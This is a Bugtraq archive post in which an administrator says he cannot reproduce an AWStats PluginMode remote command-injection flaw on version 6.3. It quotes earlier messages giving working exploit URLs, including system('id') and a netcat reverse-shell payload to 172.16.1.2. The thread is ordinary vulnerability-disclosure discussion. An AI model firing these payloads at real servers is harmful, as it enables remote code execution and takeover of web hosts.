Bugtraq mailing list archives
Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
From: Jamie Pratt <jpratt () norwich edu>
Date: Tue, 15 Feb 2005 14:25:43 -0500
So what are the conditions of this bug/vuln? I can't reproduce this on several 6.3 installs..:
awstats 6.3 from source: request: http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+; output: ****************Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1.
Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory).
*************** regards, jamie Ondra Holecek wrote:
GHC () www securityfocus com wrote: | | /*==========================================*/ | // GHC -> AWStats <- ADVISORY | \\ PRODUCT: AWStats | // VERSION: <= 6.3 | \\ URL: http://awstats.sourceforge.net/ | // VULNERABILITY CLASS: Multiple vulnerabilities | \\ RISK: high | /*==========================================*/ [...] | | PluginMode=:print+getpwent | | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.| This will satisfy eval() requirements., and :print getpwent() is executed.| |http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent| | Sanitazing limits user's input, but there is no filtration for call sympols '()'. no, user is not limited, he can execute ANY command if he add ; at the end of the command, try this awstats.pl?&PluginMode=:print+system('id')+; or even this awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+; Ondra
-- James Pratt Unix Systems Administrator Norwich University http://www.norwich.edu/it <jpratt () norwich edu> | ph. (802)485-2532
Current thread:
- AWStats <= 6.4 Multiple vulnerabilities GHC (Feb 14)
- Re: AWStats <= 6.4 Multiple vulnerabilities Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Jamie Pratt (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Herman Sheremetyev (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Jamie Pratt (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Thom Craver (Feb 16)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Micah Brandon (Feb 16)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Matt Wilder (Feb 17)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Jamie Pratt (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? twebster (Feb 15)